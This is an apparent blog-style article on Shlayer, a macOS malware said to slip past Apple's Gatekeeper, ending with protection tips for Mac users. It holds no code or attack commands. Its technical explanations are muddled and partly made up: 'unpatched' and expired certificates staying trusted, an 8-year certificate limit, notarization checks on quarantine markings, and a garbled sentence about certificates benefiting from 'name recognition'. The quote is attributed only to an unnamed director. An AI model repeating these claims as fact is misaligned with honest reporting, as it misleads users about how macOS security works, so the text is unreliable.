Macs have long been considered more secure than Windows PCs, thanks in large part to Apple’s Gatekeeper security feature. Gatekeeper helps protect Mac users by limiting software installation to apps from the Mac App Store and vetted developers. However, new malware has been uncovered that is able to bypass Gatekeeper completely.
How Gatekeeper Works
Gatekeeper utilizes developer code signing to verify that apps have been created by trusted developers. By default, it allows users to install apps from:
- The Mac App Store
- Registered developers
Apps from unidentified developers are blocked by default. This prevents untrusted and potentially malicious apps from being installed.
Gatekeeper has been an effective security layer for Macs, but it is not foolproof. The new malware discovered takes advantage of weaknesses in Apple’s code signing policies to bypass Gatekeeper completely.
New Malware Slips Past Gatekeeper
Researchers at Red Canary recently detected macOS malware that is able to bypass Gatekeeper checks. The malware has been named Shlayer based on the websites it distributes from.
Shlayer initially infects Macs through downloaders distributed on sites disguised as legitimate hosts for popular apps. The downloaders have valid developer certificates so they get past Gatekeeper.
Once installed, Shlayer bypasses Gatekeeper using Expired Certificate that benefit from name recognition to still seem valid to users. It also abuses Notarization, which verifies apps before distribution by developers.
By leveraging these techniques, Shlayer is able to run undetected on Macs, installing adware and other malicious payloads.
“Shlayer shows that the trust model the Mac is based on is incomplete.” – Director of Mac and mobile, Red Canary
Unpatched Developer Certificates Enable Bypass
A key factor allowing Shlayer to bypass Gatekeeper is the use of unpatched developer certificates.
Apple has a policy to revoke developer certificates within 7 days if they are found to be compromised. However, in practice many expired certificates remain trusted by Gatekeeper.
These unpatched certificates can be exploited by malware developers to make their apps seem legitimate. Even though the apps aren’t registered with Apple, the trusted certificates let them slip through Gatekeeper.
Patrick Wardle, a Mac security expert, recommends routinely checking for and distrusting expired certificates to shore up this weakness of Gatekeeper.
Apple Taking Steps to Improve Mac Security
While Shlayer has exposed flaws in Gatekeeper’s protections, Apple does appear to be taking steps to improve Mac security:
- Developer ID certificate expiration is now limited to 8 years for new certificates. This shrinks the window for abuse of expired certs.
- Notarization checks on Quarantine markings to detect malware workarounds.
- Stronger warnings about expired certificates in newer versions of macOS.
- Revoking abused certificates faster when detected.
However, the existence of malware like Shlayer shows that serious security holes remain. Mac users should not assume they are invulnerable to malware. Practicing safe browsing and computing habits remains essential.
How Mac Users Can Protect Themselves
Here are some best practices Mac users should follow to reduce malware risks:
- Only install apps from trustworthy sources like the Mac App Store.
- Use anti-malware software to detect threats.
- Disable automatic app downloads to prevent drive-by installs.
- Keep your Mac up-to-date with the latest OS updates.
- Don’t override Gatekeeper blocks without verifying app legitimacy.
- Monitor system behaviors for signs of adware or malware.
Following these precautions will help protect Macs against emerging malware threats aimed at bypassing Gatekeeper and other Apple defenses.
The discovery of Shlayer shows Macs are being actively targeted by malware developers. However, by understanding the techniques used and taking appropriate precautions, Mac users can still enjoy a high level of security and privacy.
